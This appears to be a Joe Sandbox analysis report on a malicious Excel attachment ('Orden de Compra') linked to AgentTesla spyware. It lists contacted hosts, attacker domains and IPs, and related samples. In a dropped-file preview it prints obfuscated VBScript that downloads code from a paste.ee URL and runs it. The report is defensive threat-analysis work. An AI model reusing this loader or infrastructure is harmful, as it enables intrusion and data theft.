                                              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0wscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.525769987.0000000004EA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://analytics.paste.eewscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://www.diginotar.nl/cps/pkioverheid0wscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.525769987.0000000004EA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://paste.ee/d/nwtkdwscript.exe, 00000006.00000003.477174452.000000000051A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.000000000051A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.477774934.000000000051A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://www.google.comwscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0wscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.525769987.0000000004EA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://paste.ee/d/nwtkd(Mwscript.exe, 00000006.00000003.475867877.00000000030F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://wednesdayyyyyyfile.duckdns.org/wednesdaysMPDW-constraints.vbs024C:EQNEDT32.EXE, 00000003.00000002.470732712.00000000003AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://contoso.com/powershell.exe, 00000009.00000002.520640546.0000000003479000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.520640546.0000000003479000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://ip-api.comAddInProcess32.exe, 0000000A.00000002.623977936.000000000241C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.623977936.0000000002438000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.623977936.0000000002381000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://analytics.paste.ee;wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://drive.google.compowershell.exe, 00000009.00000002.520640546.000000000258A000.00000004.00000800.00020000.00000000.sdmptrue
                                                                unknown
                                                                https://drive.usercontent.google.compowershell.exe, 00000009.00000002.520640546.00000000026C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://cdnjs.cloudflare.comwscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://cdnjs.cloudflare.com;wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://ocsp.entrust.net0Dwscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.525769987.0000000004EA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.575765381.000000000251A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.520640546.0000000002451000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.623977936.000000000241C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.623977936.0000000002381000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://secure.comodo.com/CPS0wscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.525769987.0000000004EA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://secure.gravatar.comwscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://themes.googleusercontent.comwscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://crl.entrust.net/2048ca.crl0wscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.525769987.0000000004EA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://github.com/dahall/taskschedulerpowershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                            unknown
                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs
                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            208.95.112.1
                                                                            ip-api.comUnited States
                                                                            53334TUT-ASUStrue
                                                                            198.46.178.134
                                                                            wednesdayyyyyyfile.duckdns.orgUnited States
                                                                            36352AS-COLOCROSSINGUStrue
                                                                            188.114.96.3
                                                                            paste.eeEuropean Union
                                                                            13335CLOUDFLARENETUStrue
                                                                            142.250.186.97
                                                                            drive.usercontent.google.comUnited States
                                                                            15169GOOGLEUSfalse
                                                                            216.58.206.46
                                                                            drive.google.comUnited States
                                                                            15169GOOGLEUSfalse
                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1540838
                                                                            Start date and time:2024-10-24 08:50:58 +02:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 6m 5s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                            Number of analysed new started processes analysed:14
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:Orden de Compra No. 78986756565344657.xlam.xlsx
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.expl.evad.winXLSX@10/10@8/5
                                                                            EGA Information:
                                                                            • Successful, ratio: 75%
                                                                            HCA Information:
                                                                            • Successful, ratio: 100%
                                                                            • Number of executed functions: 48
                                                                            • Number of non-executed functions: 6
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .xlsx
                                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                                            • Attach to Office via COM
                                                                            • Active ActiveX Object
                                                                            • Scroll down
                                                                            • Close Viewer
                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                            • Execution Graph export aborted for target powershell.exe, PID 3708 because it is empty
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • VT rate limit hit for: Orden de Compra No. 78986756565344657.xlam.xlsx
                                                                            TimeTypeDescription
                                                                            02:52:41API Interceptor73x Sleep call for process: EQNEDT32.EXE modified
                                                                            02:52:45API Interceptor28x Sleep call for process: wscript.exe modified
                                                                            02:52:47API Interceptor361x Sleep call for process: powershell.exe modified
                                                                            02:53:08API Interceptor14x Sleep call for process: AddInProcess32.exe modified
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            208.95.112.1OUTSTANDING PAYMENT STATUS 01199241024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            Circular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                            • ip-api.com/json/?fields=status,country,regionName,city,query
                                                                            RTGS_UCB_DCCB_docx.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                            • ip-api.com/json/?fields=status,country,regionName,city,query
                                                                            aoKTzGQSRP.exeGet hashmaliciousXWormBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            7EdXVD16wd.exeGet hashmaliciousXWormBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            faBnX3uZqr.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            NxR7UQaeKe.exeGet hashmaliciousXWormBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            yNDotZsd7U.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            MMsRQ2p7RL.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            rComprobantedepago_PAGOSBBVA_.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            198.46.178.13476.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                            • mondayyyyvbsgreeceee.duckdns.org/droidlatestttttt875869.txt
                                                                            transferencia interbancaria_Swift_6647875.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                            • fridaylocalmanager.duckdns.org/madamwebbbbbbbbbbb.txt
                                                                            Orden de Compra No. 434565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                            • thursdayyyyyyfileeee.duckdns.org/mandatedmangomanagerupdatedequitosbanq.txt
                                                                            65567 DHL 647764656798860.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                            • 198.46.178.134/madamwebbbbbbase64444.txt
                                                                            facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                            • 198.46.178.134/madamwebbbbbbase64444.txt
                                                                            Orden de Compra 097890.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                            • 198.46.178.134/madamwebbbbbbase64444.txt
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            ip-api.comOUTSTANDING PAYMENT STATUS 01199241024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            • 208.95.112.1
                                                                            Circular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 208.95.112.1
                                                                            RTGS_UCB_DCCB_docx.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 208.95.112.1
                                                                            aoKTzGQSRP.exeGet hashmaliciousXWormBrowse
                                                                            • 208.95.112.1
                                                                            7EdXVD16wd.exeGet hashmaliciousXWormBrowse
                                                                            • 208.95.112.1
                                                                            NxR7UQaeKe.exeGet hashmaliciousXWormBrowse
                                                                            • 208.95.112.1
                                                                            yNDotZsd7U.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                            • 208.95.112.1
                                                                            MMsRQ2p7RL.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                            • 208.95.112.1
                                                                            rComprobantedepago_PAGOSBBVA_.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 208.95.112.1
                                                                            paste.eeseethebestthingstobegetmebackwithherlove.htaGet hashmaliciousCobalt StrikeBrowse
                                                                            • 188.114.97.3
                                                                            necgoodthingswithgreatthingsentirethingstobeinonline.htaGet hashmaliciousCobalt StrikeBrowse
                                                                            • 188.114.97.3
                                                                            BL Packing List & Invoice.xlsGet hashmaliciousUnknownBrowse
                                                                            • 188.114.97.3
                                                                            DHLShippingInvoicesAwbBL000000000102220242247.vbsGet hashmaliciousRemcosBrowse
                                                                            • 188.114.96.3
                                                                            20042024150836 14.10.2024.vbeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            Swift Payment 20241014839374.vbsGet hashmaliciousRemcosBrowse
                                                                            • 188.114.96.3
                                                                            segura.vbsGet hashmaliciousAsyncRATBrowse
                                                                            • 188.114.96.3
                                                                            DHL_Shipping_Invoices_Awb_0000000.vbsGet hashmaliciousRemcosBrowse
                                                                            • 188.114.97.3
                                                                            20062024150836 11.10.2024.vbeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.jsGet hashmaliciousRemcosBrowse
                                                                            • 188.114.97.3
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            CLOUDFLARENETUSVM2ICvV5qQ.pdfGet hashmaliciousUnknownBrowse
                                                                            • 104.17.24.14
                                                                            EL-25-536_40005512_Le Cuivre_23102024.vbeGet hashmaliciousGuLoaderBrowse
                                                                            • 104.21.70.11
                                                                            OUTSTANDING PAYMENT STATUS 01199241024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            • 104.26.12.205
                                                                            PO-008847332.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                            • 104.21.53.112
                                                                            RFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            g4Cyr2T5jq.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                                                                            • 104.21.53.8
                                                                            Urgent Quotation documents One Pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                            • 104.26.12.205
                                                                            #PO247762.docxGet hashmaliciousRemcosBrowse
                                                                            • 188.114.96.3
                                                                            file.exeGet hashmaliciousLummaC, StealcBrowse
                                                                            • 172.67.206.204
                                                                            Inova oferta nr F01281624PL.htmlGet hashmaliciousUnknownBrowse
                                                                            • 1.1.1.1
                                                                            AS-COLOCROSSINGUSShipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                                                            • 192.3.176.141
                                                                            A & C Metrology OC 5457144.xlsGet hashmaliciousUnknownBrowse
                                                                            • 192.210.215.8
                                                                            #PO247762.docxGet hashmaliciousRemcosBrowse
                                                                            • 104.168.7.51
                                                                            la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                            • 192.3.165.37
                                                                            la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                            • 107.175.231.193
                                                                            Logs.xlsGet hashmaliciousLokibotBrowse
                                                                            • 192.3.176.141
                                                                            PRODUCT_INQUIRY.jsGet hashmaliciousWSHRatBrowse
                                                                            • 192.210.215.11
                                                                            Inv No.248740.xlsGet hashmaliciousUnknownBrowse
                                                                            • 107.175.229.138
                                                                            InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 172.245.123.45
                                                                            seethebestthingstobegetmebackwithherlove.htaGet hashmaliciousCobalt StrikeBrowse
                                                                            • 23.94.171.157
                                                                            TUT-ASUSOUTSTANDING PAYMENT STATUS 01199241024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            • 208.95.112.1
                                                                            Circular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 208.95.112.1
                                                                            RTGS_UCB_DCCB_docx.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 208.95.112.1
                                                                            aoKTzGQSRP.exeGet hashmaliciousXWormBrowse
                                                                            • 208.95.112.1
                                                                            7EdXVD16wd.exeGet hashmaliciousXWormBrowse
                                                                            • 208.95.112.1
                                                                            faBnX3uZqr.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                            • 208.95.112.1
                                                                            NxR7UQaeKe.exeGet hashmaliciousXWormBrowse
                                                                            • 208.95.112.1
                                                                            yNDotZsd7U.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                            • 208.95.112.1
                                                                            MMsRQ2p7RL.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                            • 208.95.112.1
                                                                            rComprobantedepago_PAGOSBBVA_.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 208.95.112.1
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            05af1f5ca1b87cc9cc9b25185115607dShipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                                                            • 142.250.186.97
                                                                            • 188.114.96.3
                                                                            • 216.58.206.46
                                                                            A & C Metrology OC 5457144.xlsGet hashmaliciousUnknownBrowse
                                                                            • 142.250.186.97
                                                                            • 188.114.96.3
                                                                            • 216.58.206.46
                                                                            #PO247762.docxGet hashmaliciousRemcosBrowse
                                                                            • 142.250.186.97
                                                                            • 188.114.96.3
                                                                            • 216.58.206.46
                                                                            PO NAHK22012FA000000.docxGet hashmaliciousUnknownBrowse
                                                                            • 142.250.186.97
                                                                            • 188.114.96.3
                                                                            • 216.58.206.46
                                                                            PO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                                                                            • 142.250.186.97
                                                                            • 188.114.96.3
                                                                            • 216.58.206.46
                                                                            Logs.xlsGet hashmaliciousLokibotBrowse
                                                                            • 142.250.186.97
                                                                            • 188.114.96.3
                                                                            • 216.58.206.46
                                                                            InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 142.250.186.97
                                                                            • 188.114.96.3
                                                                            • 216.58.206.46
                                                                            CLOSURE.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 142.250.186.97
                                                                            • 188.114.96.3
                                                                            • 216.58.206.46
                                                                            oodforme.docGet hashmaliciousRemcosBrowse
                                                                            • 142.250.186.97
                                                                            • 188.114.96.3
                                                                            • 216.58.206.46
                                                                            EX0096959.docx.docGet hashmaliciousRemcosBrowse
                                                                            • 142.250.186.97
                                                                            • 188.114.96.3
                                                                            • 216.58.206.46
                                                                            No context
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):4760
                                                                            Entropy (8bit):4.834060479684549
                                                                            Encrypted:false
                                                                            SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                                            MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                                            SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                                            SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                                            SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):64
                                                                            Entropy (8bit):0.34726597513537405
                                                                            Encrypted:false
                                                                            SSDEEP:3:Nlll:Nll
                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:@...e...........................................................
                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2256
                                                                            Entropy (8bit):3.772028195853046
                                                                            Encrypted:false
                                                                            SSDEEP:48:Z0ccBMaB6lMtqtrrMr6mMfettAe660+fhO0f8fAPXDA4OleV3AJQ0/ul4CsKsLPp:QPB6lMtqtrrMr6mMfettAe660WhO0f8Z
                                                                            MD5:54E57248990A0EBD524060171ADE45A1
                                                                            SHA1:EE9574E743E95F4EF2CF970B751139087CE37541
                                                                            SHA-256:13BC44CC6AC3CC16820100B2FDD632C3D81F2FDA2230055EA2511370E1A2477C
                                                                            SHA-512:342EC5F037AD8CD93F694DABC2892C8DCB28F33C3C3E20C6CAEC77F3B8BB3997795BB2E27FE078548472046D1CF10B81E7F0FB18518E28DB3E09EEAF65CC5CFE
                                                                            Malicious:true
                                                                            Preview:......S.e.t. .e.s.t.a.t.u.a.r. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".M.S.X.M.L.2...S.e.r.v.e.r.X.M.L.H.T.T.P...6...0.".).........m.a.r.e.t.i.n.a. .=. .a.m.y.g.d.o.p.h.i.n.i.n.a.(.".g* ... ..' ..# .[/".).....c.a.t.o.t.o.l. .=. .a.m.y.g.d.o.p.h.i.n.i.n.a.(.".d.g* ... ..' ..# .[/k.g* ... ..' ..# .[/t.g* ... ..' ..# .[/w.g* ... ..' ..# .[/n.g* ... ..' ..# .[//.g* ... ..' ..# .[/d.g* ... ..' ..# .[//.g* ... ..' ..# .[/e.g* ... ..' ..# .[/e.g* ... ..' ..# .[/..g* ... ..' ..# .[/e.g* ... ..' ..# .[/t.g* ... ..' ..# .[/s.g* ... ..' ..# .[/a.g* ... ..' ..# .[/p.g* ... ..' ..# .[//.g* ... ..' ..# .[//.g* ... ..' ..# .[/:.g* ... ..' ..# .[/p.g* ... ..' ..# .[/t.g* ... ..' ..# .[/t.g* ... ..' ..# .[/h.".).....c.a.t.o.t.o.l. .=. .R.e.p.l.a.c.e.S.t.r.i.n.g.(.c.a.t.o.t.o.l.,. .m.a.r.e.t.i.n.a.,. .".".).........e.s.t.a.t.u.a.r...O.p.e.n. .".G.E.T.".,. .c.a.t.o.t.o.l.,. .F.a.l.s.e.....e.s.t.a.t.u.a.r...S.e.n.d.........E.x.e.c.u.t.e.G.l.o.b.a.l. .e.s.t.a.t.u.a.r...R.e.s.p.o.n.s.e.T.e.x.t.............F.u.n.c.
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2256
                                                                            Entropy (8bit):3.772028195853046
                                                                            Encrypted:false
                                                                            SSDEEP:48:Z0ccBMaB6lMtqtrrMr6mMfettAe660+fhO0f8fAPXDA4OleV3AJQ0/ul4CsKsLPp:QPB6lMtqtrrMr6mMfettAe660WhO0f8Z
                                                                            MD5:54E57248990A0EBD524060171ADE45A1
                                                                            SHA1:EE9574E743E95F4EF2CF970B751139087CE37541
                                                                            SHA-256:13BC44CC6AC3CC16820100B2FDD632C3D81F2FDA2230055EA2511370E1A2477C
                                                                            SHA-512:342EC5F037AD8CD93F694DABC2892C8DCB28F33C3C3E20C6CAEC77F3B8BB3997795BB2E27FE078548472046D1CF10B81E7F0FB18518E28DB3E09EEAF65CC5CFE
                                                                            Malicious:true
